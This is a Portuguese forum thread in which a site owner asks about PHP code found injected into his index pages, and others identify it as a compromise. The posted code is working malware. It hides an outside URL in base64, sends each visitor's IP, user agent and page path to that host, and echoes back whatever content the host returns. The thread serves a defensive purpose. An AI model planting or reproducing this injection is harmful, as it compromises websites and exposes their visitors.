Código malicioso

[maurohpg 0]

Pessoal, encontrei esse código na index do meu site, e o anti virus está pegando como trojan alguém já viu esse código?

 

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           $stCurlHandle = curl_init( $stCurlLink ); 
   }
   } 
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   $sResult = @curl_exec($stCurlHandle); 
   if ($sResult[0]=="O") 
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle); 
}
}
?>

 

Pelo que eu poude perceber há um link engriptado em 64bits na linha:

 

$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

[rfps888 7]

O problema não é em seu código, o site para onde é feita a ligação é que está associado como malware, se fizer o:

 

echo base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw');

 

irá retornar o site "http://adveconfirm.com" que se aceder aparece como malware.

[maurohpg 0]

Então eu vi que é apontado para essa url mais o que não intendo é que como que foi colocado todos esses códigos em páginas index.php do meu site, estou fazendo testes de vulnerabilidade do código através do Acunetix e ele só me mostra vulnerabilidade com o phpthmub através da "sc"r que utilizo para redimencionar as imagens nenhuma outra vulnerabilidade é mostrada.

[rfps888 7]

Estive pesquisando e aparentemente seu website foi hackeado, dê uma olhada nesse artigo:

 

adveconfirm.com

[maurohpg 0]

Então eu dei uma lida nesse artigo, o pessoal de TI diz que foi vulnerabilidade no código mais dei uma olhada em tudo e não encontrei nenhuma falha que possa ocorrer ataques, mais fiz conforme esse artigo sugeriu, troquei as senhas do ftp e do bando de dados e dos administradores do sistema, e limpei todas as páginas que tinham esse cóedigo assim, além disso protegi todos os formulários do site com limitadores de caracteres, agora vou colocar um captcha neles também, depois disso não sei o que pode ser mais, vi algumas vulnerabilidades que podem ocorrer através de Cross Site Scripting (XSS).